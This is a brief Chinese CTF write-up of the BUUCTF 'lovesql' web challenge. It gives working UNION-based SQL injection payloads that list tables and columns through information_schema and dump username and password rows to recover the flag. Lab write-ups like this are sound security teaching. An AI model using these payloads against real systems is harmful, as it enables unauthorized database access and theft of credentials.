47,【5】BUUCTF web lovesql

进入靶场

可知是单引号闭合,属于字符串型注入

则后续方法与字符串型无异

使用order by 判断出字节数为3

使用union select寻找注入点时切记第一个select为空

库名geek

表名group_concat(table_name) from information_schema.tables where table_schema='geek'#

geekuser l0ve1ysq1

字段名group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

id username password

group_concat(column_name) from information_schema.columns where table_name='geekuser'#

可知两个表字段名相同

查询字段内容

group_concat(id,username,password) from geek.l0ve1ysq1#

group_concat(id,username,password) from geek.geekuser#

得到flag

笔记

1,本题考查字符串类型的注入

2,group_concat(id,username,password) from geek.geekuser#

一次可以爆出表格所有内容

相关推荐
小高不会迪斯科3 分钟前
CMU 15445学习心得(一) 磁盘、数据页与数据库存储模型
数据库·oracle
HalvmånEver4 分钟前
Linux:信号捕捉下(信号四)
linux·运维·数据库
培风图南以星河揽胜5 分钟前
Oracle数据库备份与恢复策略:RMAN实战与灾难应对(DBA与Java开发者必读)
数据库·oracle·dba
凯子坚持 c6 分钟前
Qt常用控件指南(2)
服务器·数据库·qt
gjc5927 分钟前
MySQL执行计划详解:从看不懂到秒懂,一线DBA的实战笔记
数据库·笔记·mysql·dba
战神卡尔迪亚8 分钟前
校招DBA成长记录(一)
数据库·学习·dba
倔强的石头1069 分钟前
金仓数据库兼容性实践:Oracle 迁移的问题词拆解与验证
数据库·oracle·kingbase
程序边界11 分钟前
金仓时序数据库深度体验:从踩坑到真香,一个DBA的真实观察
数据库·时序数据库·dba
努力成为包租婆1 小时前
uniapp--原生插件开发
java·数据库·uni-app
羑悻的小杀马特2 小时前
PostgreSQL + Cpolar 组合拳,彻底打破局域网限制,远程访问数据库像本地一样简单
数据库·postgresql